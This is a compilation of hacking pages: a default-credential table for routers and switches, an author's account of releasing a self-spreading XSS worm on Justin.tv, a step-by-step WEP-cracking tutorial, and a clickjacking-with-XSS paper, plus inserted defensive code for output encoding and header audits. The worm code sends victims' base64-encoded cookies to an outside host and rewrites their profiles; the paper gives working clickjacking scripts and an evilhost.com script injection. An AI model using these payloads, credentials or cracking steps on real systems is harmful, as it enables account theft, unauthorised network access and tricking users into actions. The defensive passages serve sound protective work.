Default usernames and password



  

Default usernames and passwords for Routers/Switches/Hubs


   Type/vendor/notes/etc                     Username Password
  
   3Com                                      admin    synnet
   3Com                                      read     synnet
   3Com                                      write    synnet
   3Com                                      monitor  monitor
   3Com                                      manager  manager
   3Com                                      security security
   3Com_Office_Connect_5x0_ISDN_Routers      n/a      PASSWORD
   3comCellPlex7000                          tech     tech
   3comCoreBuilder7000/6000/3500/2500        debug    synnet
   3comCoreBuilder7000/6000/3500/2500        tech     tech
   3comHiPerARCv4.1.x                        adm      <blank>
   3ComLANplex2500                           debug    synnet
   3ComLANplex2500                           tech     tech
   3comLinkSwitch2000/2700                   tech     tech
   3comSuperStackIISwitch                    2200     debug
   3comSuperStackIISwitch                    2700     tech
   ACC(Ericsson)                             netman   netman
   ADC_Kentrox_Pacesetter_Router             n/a      secret
   All_Zyxel_equipment                       n/a      1234
   AT&T_3B2_firmware                         n/a      mcp
   AXIS200/240[netcam]                       root     pass
   Bay_routers                               Manager  <blank>
   Bay_routers                               User     <blank>
   Bay350T_Switch                            n/a      NetICs
   BaySuperstackII                           security security
   BRASX/I01_(DataCom)                       n/a      letmein
   BreezeCOM_adapters2.x(console_only)       n/a      laflaf
   BreezeCOM_adapters3.x(console_only)       n/a      Master
   BreezeCOM_adapters4.x(console_only)       n/a      Super
   Cayman_DSL                                n/a      <blank>
   Crystalview_outsideview32                 n/a      crystal
   digiCorp_(viper?)                         n/a      BRIDGE
   digiCorp_(viper?)                         n/a      password
   DLink_hub/switches                        D-Link   D-Link
   Flowpoint_DSL_installed_by_Covad          n/a      password
   Flowpoint_DSL2000                         admin    admin
   Jetform_design                            Jetform  n/a
   Lantronics_Terminal_server_port           7000     n/a
   Linksys_DSL                               n/a      admin
   Livingston_IRX_router                     !root    <blank>
   Livingston_officerouter                   !root    <blank>
   Livingston_portmaster2/3                  !root    <blank>
   Microplex_print_server                    root     root
   Motorola-Cablerouter                      cablecom router
   Netopia_7100                              <blank>  <blank>
   Netopia_9500                              netopia  netopia
   Orbitor_console                           n/a      password
   Orbitor_console                           n/a      BRIDGE
   Osicom(Datacom)                           sysadm   sysadm
   Shiva                                     root     <blank>
   Shiva                                     Guest    <blank>
   SpeedstreamDSL(Efficient)                 n/a      admin
   UClinux_for_UCsimm                        root     uClinux
   Webramp                                   wradmin  trancell
   Alteon ACEswitch 180e (web)               admin    admin
   Alteon ACEswitch 180e (telnet)            admin    <blank>
   NETPrint (all)                            n/a      sysadm
   Xylan Omniswitch                          admin    switch
   Xylan Omniswitch                          diag     switch
   AcceleratedDSL CPE and DSLAM              sysadm   anicust
   Arrowpoint                                admin    system
   Cabletron (routers & switches)            <blank>  <blank>
  
   Needed
  
   Packeteer
   Cabletron
   SMC
   Accton
  
 


 

XSS worms







XSS worms are pretty neat, interactive worms that propagate by using a client's browser to progressively infect other profiles in some way. I wrote my own worm a while back, and I wanted to talk about how it worked, how it was effective, and what challenges I faced.

The worm I created was in Justin.Tv. The best thing about XSS worms is that they're as unique as the XSS. Tons of different things may occur, and whether the worm is successful depends on many different variables.

The XSS in justin.tv was found by x2Fusion. x2Fusion and I worked on the worm right when we came up with the idea of making one.

The XSS was in the Location field. So, people viewing another user's profile would run whatever we put there, as it was not sanitized. But there was one more challenge: the location was placed in the title sanitized. We had to find a way to not only hide the worm in the title, but we also had to implement some javascript that automatically changed the title as soon as it loaded.

Once we started on the worm, we made the .js file on an external website, and before script inclusion we put several HTML comment tags to hide it in the title. In the location javascript, we edited the location javascript (local) to dynamically remove the title, keeping it stealthy (as possible) to avoid other issues. The local javascript also made a hidden, blank iFrame that we could reference in the remote javascript.

To start off, the remote javascript would force the iframe to our website and provide, dynamically, the client's cookies and profile location. We would use this to track what profiles were infected by whom, and when, and all of the client details at the time.

We would create the payload inside the remote javascript that we can use to inject with the viewing user's profile. The "payload" data is pretty much our local javascript. We also added a ^ (rare location element, if you ask me) character after the user's location, which our local javascript will use to manage the dynamic script.

What we didn't think about, well... we were in a hurry so it's not our fault, ^ would remain on the titles. People would definitely notice, but it wasn't patched until about 24 hours after.

We printed a new iFrame (hidden), and used it to read out the details in convenient little sub-frame form elements. We took the elements and processed them, only changing the Location field if it wasn't already infected, and then sending the request (if it wasn't already infected).

This was more complicated than it seemed... we had to fight between IE and Firefox (Safari follows Firefox for the most part) compatibility. After doing that, we realized... if the infected person was... well an actual broadcaster, the default page wasn't what we were looking for. Thus, we needed to dynamically read whether certain elements were given on the page, and also go to the correctly named page.

We had another request upon new infections that saved user details.

Once the request was sent, by then it is assumed the profile was infected and we have it recorded on our side. In fact, quickly after we released it, I made a quick little PHP script that waited for more accounts to be infected (and their user details), and printed out a highlighted table element and had it fade out after 5 seconds. After about 1500 profiles, I sat there watching 4 to 10 be infected a second, and it was funny to watch them be infected live.

Actually, check it out:

function URLEncode (clearString)
    {
    var output = '';
    var x = 0;
    clearString = clearString.toString();
    var regex = /(^[a-zA-Z0-9_.]*)/;

    while (x < clearString.length)
        {
        var match = regex.exec(clearString.substr(x));

        if (match != null && match.length > 1 && match[1] != '')
            {
            output += match[1];
            x += match[1].length;
            }

        else
            {
            if (clearString[x] == ' ')
                output += '+';

            else
                {
                var charCode = clearString.charCodeAt(x);
                var hexVal = charCode.toString(16);
                output += '%' + (hexVal.length < 2 ? '0' : '') + hexVal.toUpperCase();
                }
            x++;
            }
        }
    return output;
    }

function save_settings(action, enctype, method, query)
    {
    var xmlHttp;

    try
        {
        xmlHttp = new XMLHttpRequest();
        }
    catch (e)
        {
        try
            {
            xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
            }
        catch (e)
            {
            try
                {
                xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
                }
            catch (e)
                {
                return false;
                }
            }
        }
    xmlHttp.open(method, action, true);
    xmlHttp.setRequestHeader('Content-Type', enctype);
    xmlHttp.send(query);
    return false;
    }
document.title = document.title.split('^')[0] + " - Justin.tv";
var base64chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'.split("");
var base64inv = {
};

for (var i = 0; i < base64chars.length; i++)
    {
    base64inv[base64chars[i]] = i;
    }

function b64_d (s)
    {
    s = s.replace(new RegExp('[^' + base64chars.join("") + '=]', 'g'), "");
    var p = (s.charAt(s.length - 1) == '=' ? (s.charAt(s.length - 2) == '=' ? 'AA' : 'A') : "");
    var r = "";
    s = s.substr(0, s.length - p.length) + p;

    for (var c = 0; c < s.length; c += 4)
        {
        var n = (base64inv[s.charAt(c)] << 18) + (base64inv[s.charAt(c + 1)] << 12) + (base64inv[s.charAt(c + 2)] << 6)
            + base64inv[s.charAt(c + 3)];
        r += String.fromCharCode((n >>> 16) & 255, (n >>> 8) & 255, n & 255);
        }
    return r.substring(0, r.length - p.length);
    }

function b64_e(s)
    {
    var r = "";
    var p = "";
    var c = s.length % 3;

    if (c > 0)
        {
        for (;c < 3; c++)
            {
            p += '=';
            s += "\0";
            }
        }

    for (c = 0; c < s.length; c += 3)
        {
        if (c > 0 && (c / 3 * 4) % 76 == 0)
            {
            r += "\r\n";
            }
        var n = (s.charCodeAt(c) << 16) + (s.charCodeAt(c + 1) << 8) + s.charCodeAt(c + 2);
        n = [(n >>> 18) & 63, (n >>> 12) & 63, (n >>> 6) & 63, n & 63];
        r += base64chars[n[0]] + base64chars[n[1]] + base64chars[n[2]] + base64chars[n[3]];
        }
    return r.substring(0, r.length - p.length) + p;
    }
document.getElementById('tframeid').src = "http://thedefaced.org/jtv/jtv_test.php?act=mesh&cookie="
    + b64_e(document.cookie) + "&location=" + b64_e(String(window.location));
document.write("");
payload = b64_d(
    "<base64-encoded payload omitted>");
document.getElementById('tframeset').onload = function ()
    {
    if (frames['tframeset'].document.getElementById('user_location').value.indexOf(
        'All openings in an internal or external floating roof')
        == -1)
        {
        query = "section=profile&session_user=";
        query += frames['tframeset'].document.getElementById('session_user').value;
        query += "&subsection=profile_info";
        query += "&commit=Save%20Changes";

        if (frames['tframeset'].document.getElementById('user_hide_im_watching').value != 1)
            {
            query += "&user[hide_profile_actions]=0";
            }

        else
            {
            query += "&user[hide_profile_actions]=1";
            };

        if (frames['tframeset'].document.getElementById('user_hide_profile_actions').value != 1)
            {
            query += "&user[hide_profile_actions]=0";
            }

        else
            {
            query += "&user[hide_profile_actions]=1";
            };
        query += "&user[profile_about]="
            + URLEncode(frames['tframeset'].document.getElementById('user_profile_about').value);
        query += "&user[favorite_quotes]="
            + URLEncode(frames['tframeset'].document.getElementById('user_favorite_quotes').value);
        query += "&user[interests]=" + URLEncode(frames['tframeset'].document.getElementById('user_interests').value);
        query += "&user[location]="
            + URLEncode(frames['tframeset'].document.getElementById('user_location').value + payload);
        query += "&user[sex]=" + frames['tframeset'].document.getElementById('user_sex').value;
        query += "&user[name]=" + URLEncode(frames['tframeset'].document.getElementById('user_name').value);
        save_settings('/settings', 'application/x-www-form-urlencoded', 'POST', query);
        }
    document.getElementById('tframeset').onload = function ()
        {
        };

    document.getElementById('tframeset').onreadystatechange = function ()
        {
        };
    };

document.getElementById('tframeset').onreadyst
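
The root cause described above is that the Location value was encoded for the title but not for the profile body. The following is an added example, not code from the original post or from Justin.tv: it applies one encoder at every sink and scans stored values for markup so that already-modified profiles can be found and cleaned. The function names, the page template and the sample profiles are assumptions constructed for illustration; only the `user_location` id comes from the post.

```javascript
// Added example, not part of the original post. Names, template and sample
// data are constructed for illustration.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode a value for HTML text and quoted-attribute contexts.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Render a profile page. The same encoder is applied to the title sink and
// the body sink, so neither can be the one that was forgotten.
function renderProfile(user) {
  const name = escapeHtml(user.name);
  const loc = escapeHtml(user.location);
  return [
    '<html><head>',
    `<title>${name} (${loc}) - Profile</title>`,
    '</head><body>',
    `<h1>${name}</h1>`,
    `<div id="user_location">${loc}</div>`,
    '</body></html>',
  ].join('\n');
}

// Markup that has no business in a free-text location field.
const MARKUP_PATTERNS = [
  { name: 'script tag', re: /<\s*script\b/i },
  { name: 'iframe tag', re: /<\s*iframe\b/i },
  { name: 'html comment', re: /<!--|-->/ },
  { name: 'event handler attribute', re: /<[^>]*\bon[a-z]+\s*=/i },
];

// Return the profiles whose stored location contains markup, with the reasons,
// so they can be reviewed and reset during cleanup.
function findSuspectProfiles(profiles) {
  const hits = [];
  for (const p of profiles) {
    const reasons = MARKUP_PATTERNS
      .filter((m) => m.re.test(p.location))
      .map((m) => m.name);
    if (reasons.length > 0) hits.push({ id: p.id, reasons });
  }
  return hits;
}

// Constructed sample rows: two ordinary values and one carrying markup.
const SAMPLE_PROFILES = [
  { id: 1, name: 'alice', location: 'Seattle, WA' },
  { id: 2, name: 'bob', location: 'Austin<!-- x --><script src="//example.invalid/x.js"></script>' },
  { id: 3, name: 'carol', location: 'Tokyo <3 & Osaka' },
];

console.log(findSuspectProfiles(SAMPLE_PROFILES));
console.log(renderProfile(SAMPLE_PROFILES[1]));
```

Encoding at output is the fix; the scan is only for finding rows written before the fix went in, and a benign value such as the third sample is encoded but not flagged.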


10 Easy Steps to Crack a Wireless WEP Key 128 bit using Ubuntu 7.10

using Aircrack-ng Tools

This is my First Tutorial

1) sudo airmon-ng start wifi0 (puts your wifi card into monitor mode)

2) sudo wlanconfig ath0 destroy

3) sudo ifconfig ath1 up (brings your ath1 interface up)

4) sudo iwconfig ath1 mode monitor channel 11 (sets ath1 to monitor mode on channel 11)

5) sudo aireplay-ng -1 0 -e linksys -a 00:11:22:33:44:55 -h 00:18:4D:6E:54:79 ath1 (sends an authentication request)

6) sudo aireplay-ng -5 -b 00:11:22:33:44:55 -h 00:18:4D:6E:54:79 ath1 (fragmentation attack)

7) packetforge-ng -0 -a 00:11:22:33:44:55 -h 00:18:4D:6E:54:79 -k 255.255.255.255 -l 255.255.255.255 -y <your xor file>.xor -w arp-request (generates an ARP packet)

8) sudo airodump-ng -c 11 --bssid 00:11:22:33:44:55 -w capture ath1 (monitors the AP)

9) sudo aireplay-ng -2 -r arp-request ath1 (sends the ARP request using interactive frame selection)

10) sudo aircrack-ng -z *.cap (capture*.cap selects all dump files starting with "capture" and ending in "cap"; -z selects the PTW attack)

and below is the link for the video

http://in.youtube.com/watch?v=Vvok-PBSpFY



ClickJacking




-[ INFOS ]-----------------------------------------------------------------------
Title: "The Clickjacking meets XSS: a state of art"

---------------------------------------------------------------------------------


-[ SUMMARY ]---------------------------------------------------------------------
    0x01: Introduction
    0x02: What is the Problem
    0x03: JavaScript always loves us
        \_ 0x03a: Cursor tracking
        \_ 0x03b: Graphic overlaying
    0x04: XSS done!
    0x05: Conclusions
---------------------------------------------------------------------------------



---[ 0x01: Introduction ]
Clickjacking attacks come from a recent discovery by two well-known
researchers, Jeremiah Grossman (from WhiteHat Security) and Robert "RSnake" Hansen
(from Ha.ckers.org): it's a quite simple but effective attack whose potential has
already been described in several articles such as:
http://ha.ckers.org/blog/20081007/clickjacking-details/
http://jeremiahgrossman.blogspot.com/2008/10/clickjacking-web-pages-can-see-and-hear.html

You can take a look at the BlackHat Webcast made by Jeremiah Grossman disclosing
more details on Clickjacking and on HTML and JavaScript design issues at this
address: http://www.blackhat.com/html/webinars/clickjacking.html

What we'll quickly analyze in this short whitepaper is how to combine two different
attacks, XSS and Clickjacking, to make them even more effective.
-------------------------------------------------------------------------------[/]



---[ 0x02: What is the Problem ]
One of the most common problems when deploying client-side attacks (such
as CSRFs) is spreading the page that carries the attack vectors specifically
built for the purpose.

It's somewhat problematic to trick your victim into visiting an unknown page where
he should fall for the attack, and it's just as problematic to find the right place
to host that page on the net.

What about injecting your clickjacking vectors in a vulnerable webpage trusted by
the victim himself? This would make the attack less suspicious and probably much
easier to accomplish, since the user will be completely reassured by the
genuineness of the website he is visiting.
-------------------------------------------------------------------------------[/]



---[ 0x03: JavaScript always loves us ]
Of course we're going to use some JavaScript code to accomplish our attack
attempts; specifically, we're going to try two different methods:
- 0x03a = making a cursor-following IFRAME on which the user will be forced to
      click;
- 0x03b = creating some specific HTML code to be overlaid on other elements inside
      the page.

Have fun :-)
-------------------------------------------------------------------------------[/]



------[ 0x03a: Cursor tracking ]
The first Clickjacking attack we are going to prepare will be named "Cursor
tracking": we'll use JavaScript to make a "moving" trap IFRAME.

Let's start by preparing the code which will deploy the Clickjacking attack:
what we want to do is to get the user clicking on a specific button or link which
will force him to perform some action on the website we will load in a crafted
invisible IFRAME.

First let's prepare the IFRAME code in which we'll load the button to be clicked:
   
    <iframe id="victim" src="http://target.com/page.php" scrolling="no"
    style="opacity: 0;position: absolute;left: 10;bottom: 10;"
    width="500px;"></iframe>

In this simple IFRAME declaration we just have to be sure to turn off the
"scrolling" function and to set the "opacity" property to 0 in order to make the
page invisible to the victim.  The position of the page inside the IFRAME depends
on where the user should click, you would probably want to fix it using:

    margin-top: X;
    margin-left: X;

Using negative values you'll get the page more and more centered into the IFRAME.

The next step is to prepare a JavaScript function that will make the IFRAME follow
the user's cursor on the webpage we'll inject the code into, and we can achieve
this using the Event Handlers as follows.

    function getPosition(e) {
        e = e || window.event;
        var cursor = {x:0, y:0};
        if (e.pageX || e.pageY) {
            cursor.x = e.pageX;
            cursor.y = e.pageY;
        } else {
            var de = document.documentElement;
            var b = document.body;
            cursor.x = e.clientX + (de.scrollLeft || b.scrollLeft) - /
            (de.clientLeft || 0);
            cursor.y = e.clientY + (de.scrollTop || b.scrollTop) -      /
            (de.clientTop || 0);
        }
       
        return cursor;
    }

This function retrieves the X and Y coordinates of the user's cursor in the webpage
every time it gets called.

    function clickjacking(e) {
        var loadFrame = document.getElementById("victim");
        var curPos = getPosition(e);
        loadFrame.setAttribute('style','opacity:0;position:absolute;top:'/
        + (curPos.y - 80) + ';left:' + (curPos.x - 15) + ';');
    }

Again, this one loads the IFRAME, calls the previous "getPosition" function and
changes the style attributes of the loaded IFRAME with the new coordinates
retrieved from the cursor tracking function.

    window.captureEvents(Event.MOUSEMOVE);
    window.onmousemove=clickjacking;

This will register the MOUSEMOVE event handler and make the "clickjacking" function
be called at each movement of the user's cursor inside the webpage.  At this point
the JavaScript code we created makes the IFRAME follow the victim's cursor inside
the webpage and forces him to click on a specific button contained in that IFRAME
at each click he apparently makes on a safe and genuine page.

Now let's make our JavaScript print out the IFRAME inside the HTML code with
document.write:

document.write("<iframe id=\"victim\" src=\"http://target.com/page.php\"
scrolling=\"no\" style=\"opacity: 0;position: absolute;left: 10;bottom: 10;\"
width=\"500px;\"></iframe>");

In this way the IFRAME code will be printed inside the vulnerable web page we're
going to exploit as soon as our XSS attack vector is included.

Our JavaScript code will finally look as follows:

<!-- clickjacking.js -->
function getPosition(e) {
    e = e || window.event;
    var cursor = {x:0, y:0};

    if (e.pageX || e.pageY) {
        cursor.x = e.pageX;
        cursor.y = e.pageY;
    } else {
        var de = document.documentElement;
        var b = document.body;
        cursor.x = e.clientX + (de.scrollLeft || b.scrollLeft) -  /
        (de.clientLeft || 0);
        cursor.y = e.clientY + (de.scrollTop || b.scrollTop) -    /
        (de.clientTop || 0);
    }
   
    return cursor;
}

function clickjacking(e) {
    var loadFrame = document.getElementById("victim");
    var curPos = getPosition(e);
    loadFrame.setAttribute('style','opacity:0;position:absolute;top:' +  /
    (curPos.y - 80) + ';left:' + (curPos.x - 15) + ';');
}

window.captureEvents(Event.MOUSEMOVE);
window.onmousemove=clickjacking;

document.write("<iframe id=\"victim\" src=\"http://target.com/page.php\"  /
scrolling=\"no\" style=\"opacity: 0;position: absolute;left: 10;bottom: 10;\"  /
width=\"500px;\"></iframe>");
<!-- EOF -->
-------------------------------------------------------------------------------[/]



------[ 0x03b: Graphic overlaying ]
Another way is to create some HTML code to be injected in the webpage, whose
graphic components will be overlaid by new fake ones that invite the user to
click.

For example let's assume that our victim is visiting a website in which there is
some code that lets him remove his buddies:

    <form method="POST" name="friends" action="remove.php">
        <div>George Lucas</div>
        <input type="hidden" name="friendid" value="123456" />
        <input type="submit" value="Remove from friends" />
    </form>

We want to force the user to remove "George Lucas" from his friends without his
knowledge; we can craft some JavaScript code as follows:

<!-- clickjacking.js -->
function bonus() {
    document.friends.submit();
}
document.write("<div style=\"position:absolute;top:Ypx;left:Xpx;\"><input  /
type=button value=\"Your friend sent you a gift, get it!\" onClick=\"javascript:bonus()\" /
/></div>");
<!-- EOF -->

This will create a button positioned at the X and Y coordinates, exactly
overlaying the "Remove from friends" button and making it invisible to the user.
When he clicks our button he will instead submit the FORM, which will remove the
poor "George Lucas" from his buddy list.

This is just one example of how the overlaying technique can be used; another
could be to replace the original login form with a new one specifically crafted
and positioned inside the page with the TOP and LEFT style attributes.
-------------------------------------------------------------------------------[/]



---[ 0x04: XSS done! ]
Assuming that a webpage our victim regularly visits (like an ebanking page
or a blog or whatever) is vulnerable to Cross Site Scripting (even better if
Permanent), we can inject the JavaScript code we forged earlier in order to deploy
our XSS-Clickjacking attack, which the victim will almost certainly fall for.

<script src=http://evilhost.com/clickjacking.js></script>

This is the XSS vector we should use to get our JavaScript code executed in
the victim's browser: the injection can be done, as we've already seen
(http://www.playhack.net/papers/18), through a URL's GET parameter or an
unsanitized user form input.

Obviously a Non-Permanent XSS vulnerability would require some prior spreading
of the crafted malicious link, so that the victim notices it and follows it.
-------------------------------------------------------------------------------[/]



---[ 0x05: Conclusions ]
Clickjacking is a very cute attack technique that gets even better when
matched with a Permanent or Non-Permanent Cross Site Scripting vulnerability.

The funny and interesting thing about this attack is that it leaves a lot of room
for the attacker's creativity and inventiveness, letting him express the best ideas
of the sublime art of tricking web users.

There are tons of possibilities and I invite you to mail me whenever you create a
new and smart one you'd like to share ;-)
-------------------------------------------------------------------------------[/]
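
The two halves of the combined attack are stopped by different response headers: the framed site (target.com in the paper) needs an anti-framing policy, and the XSS-vulnerable page needs a script-src policy that refuses scripts from hosts such as evilhost.com. The following is an added example, not code from the paper: a header audit that answers both questions for a given response. The origin https://trusted.example and all sample headers are constructed, and the CSP matching is deliberately simplified as noted in the comments.

```javascript
// Added example, not from the paper. Simplified CSP matching: only 'self',
// '*', scheme-only sources and exact scheme://host or host sources are handled;
// every other quoted keyword ('none', nonces, hashes) matches no URL.
function parseCsp(value) {
  const directives = new Map();
  for (const part of String(value || '').split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    // CSP ignores a repeated directive; the first occurrence wins.
    if (!directives.has(name)) directives.set(name, tokens.slice(1));
  }
  return directives;
}

// Case-insensitive header lookup on a plain object of response headers.
function getHeader(headers, name) {
  const key = Object.keys(headers).find((k) => k.toLowerCase() === name);
  return key === undefined ? '' : String(headers[key]);
}

function sourceMatches(source, pageOrigin, targetUrl) {
  const target = new URL(targetUrl);
  const s = source.toLowerCase();
  if (s === "'self'") return target.origin === new URL(pageOrigin).origin;
  if (s.startsWith("'")) return false;
  if (s === '*') return target.protocol === 'http:' || target.protocol === 'https:';
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return target.protocol === s;
  if (s.includes('://')) {
    try { return target.origin === new URL(s).origin; } catch (e) { return false; }
  }
  return target.host === s;
}

// Can a page at pageOrigin that sends these headers be loaded in a frame by
// embedderOrigin? frame-ancestors, when present, replaces X-Frame-Options.
function canBeFramedBy(headers, pageOrigin, embedderOrigin) {
  const csp = parseCsp(getHeader(headers, 'content-security-policy'));
  if (csp.has('frame-ancestors')) {
    return csp.get('frame-ancestors').some((src) => sourceMatches(src, pageOrigin, embedderOrigin));
  }
  const xfo = getHeader(headers, 'x-frame-options').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return new URL(embedderOrigin).origin === new URL(pageOrigin).origin;
  return true; // no anti-framing header at all
}

// Would a page at pageOrigin that sends these headers load an external script
// from scriptUrl? script-src falls back to default-src; no policy allows all.
function allowsScriptFrom(headers, pageOrigin, scriptUrl) {
  const csp = parseCsp(getHeader(headers, 'content-security-policy'));
  const list = csp.get('script-src') || csp.get('default-src');
  if (!list) return true;
  return list.some((src) => sourceMatches(src, pageOrigin, scriptUrl));
}

// Constructed sample responses: weak setting beside the corrected one.
const WEAK_TARGET = {};
const HARDENED_TARGET = {
  'Content-Security-Policy': "frame-ancestors 'none'",
  'X-Frame-Options': 'DENY',
};
const WEAK_PAGE = {};
const HARDENED_PAGE = {
  'Content-Security-Policy': "default-src 'self'; script-src 'self' https://cdn.trusted.example",
};
```

A script-src policy limits what an injection can load but does not replace fixing the injection itself; the overlay variant in 0x03b runs entirely inside the vulnerable page, so anti-framing headers do nothing against it.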